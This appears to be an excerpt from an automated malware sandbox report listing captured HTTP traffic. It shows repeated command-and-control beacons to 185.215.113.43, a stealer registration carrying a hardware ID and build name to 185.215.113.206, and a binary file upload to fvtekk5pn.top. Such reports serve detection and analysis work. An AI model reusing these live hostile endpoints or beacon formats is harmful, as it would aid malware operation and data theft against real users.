                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 35911Content-Type: multipart/form-data; boundary=------------------------wixWPdqX0bfCJZwAdi93jdData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 77 69 78 57 50 64 71 58 30 62 66 43 4a 5a 77 41 64 69 39 33 6a 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 7a 69 7a 75 74 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 68 f8 e8 a2 8d c9 8d 32 bd 37 ad b1 22 67 a9 20 2e 07 a9 8a 5f 78 0c 94 29 2c 1e c3 3f e8 c8 3b 3c fe 04 56 91 d0 b5 53 bd 31 69 d4 4c cf 7d e6 9e 42 17 26 f9 98 17 f8 6f 17 98 eb 65 7a 8f 90 4d de e2 a2 8f 6e b0 27 3a 7a 68 d6 05 60 f8 a6 42 a2 9f a6 d4 f8 92 6a 64 18 cb 58 d8 eb 67 e2 12 7d 08 3f e5 c4 19 82 7c 13 3a 64 bc 17 e0 90 76 4f 39 2f f0 c8 c9 c9 81 65 5d 69 a4 c8 d9 f2 6a 91 c9 9c d1 cf a3 ae 57 61 a5 4a 96 bd c8 2c d6 0b 6e a0 8f 63 eb dc 55 8c 1b 08 ff 15 87 76 1a 31 5a 7f 55 7d 4e d9 7f 15 09 e9 bc 60 5b 93 22 34 09 aa aa 39 90 07 8d 74 64 e5 d5 b0 01 af 3d ec a9 5a 80 bc b8 51 8b 62 ed 5c b9 f5 7d bc 87 a6 b7 4f 9d c6 67 f4 08 c4 cd bf bf d2 bb b6 df 30 68 1f 1e ad 03 43 0d 04 28 83 e4 6c 55 18 51 5d 2e 5f 46 b3 9e 39 ff ef 73 f6 ae 8a 23 b2 27 bc 25 85 15 d1 7a 84 e9 44 29 ea 21 f5 f4 d5 17 a0 e6 35 1c e9 7e 72 00 91 8f 8d d7 8a a1 f0 cd 5d 65 25 e7 45 4a db 83 0f e9 7f 92 7b 1e 96 c0 52 c6 be d9 25 45 7f bf 40 ba 74 13 df ae b8 d3 43 9e 4d 03 40 dd c5 7f 77 50 c4 99 75 53 08 08 59 1b 92 65 69 be 44 7d 42 b4 25 45 66 5d 41 06 cd 7a 07 72 32 5e dc 38 82 07 69 0a e1 cc 32 17 3d 6f a3 c7 91 66 03 f4 97 a8 79 3c 45 1d e5 a7 93 54 2c 6c 88 bb 32 60 f1 33 01 c4 5a 74 40 3c 29 d9 05 48 16 29 68 46 f8 8c fe b4 52 df 66 50 36 3d 6d d1 70 6c 65 e2 1a 4a 8c 73 14 b1 90 96 60 6c 4c 51 49 48 4f 60 13 58 6f 54 ec 81 9a 98 be 0d a3 8c f4 68 99 20 1c db 16 80 98 4c d6 71 9c 53 44 d1 ae e8 43 3d 40 bd 62 47 8f 82 fc ab f0 20 ba e4 46 50 eb 83 04 5b 8f 37 f8 0f 1e f7 40 d9 dd 51 88 a0 92 61 0a 50 fb b8 e5 06 59 30 19 3c c5 52 ba 97 9d b7 a8 a8 62 63 05 86 ab d0 af 22 f3 c0 41 4e dc 26 59 32 05 50 5e ce 06 43 00 7f 4e 34 72 6a 90 f3 7d 8f bf 0f a3 a8 d4 73 5f 28 df 17 65 1b 30 ee 5e 57 46 1d 00 02 8c f6 c0 c9 a6 96 d5 66 94 94 13 b9 f1 f5 2d 43 b6 45 18 cc 17 bf 7c f4 90 a3 4a 3e a6 1d c9 3b bf 75 dc 47 cd 81 a9 7e a6 5a 56 50 db 51 28 0f b2 b6 f0 bf fc 89 23 5b da 29 5d 34 40 bc aa 2a 4b 31 d8 4f 35 27 22 84 28 ca cd 87 83 7b d5 7d 3c 5b 5f 18 eb f1 50 82 bb 3e e9 66 3c 2f 61 eb 52 b4 3b a3 7d ae fe ae 14 a7 a2 b5 6d 33 93 01 a2 92 b8 c6 ea 4c 4e 2f a3 c5 64 b1 df 4f 19 d8 84 11 4f 02 89 ee ea c1 37 b0 5a a3 fe be 14 66 04 c3 35 e9 c1 1f 5f cd 79 ed c6 c1 81 88 cc a2 65 e9 b2 d0 be e9 a8 2f fa c1 eb 7f 52 7f 66 9e 0a 0f 17 c5 92 62 f2 9b e0 d4 52 f0 a8 83 bb 57 d8 80 4e f6 89 83 a6 d8 fd
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 43 34 45 46 33 32 41 37 44 35 34 37 38 32 34 35 32 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="hwid"2BC4EF32A7D547824525------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="build"mars------DBGHJEBKJEGHJKECAAKJ--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
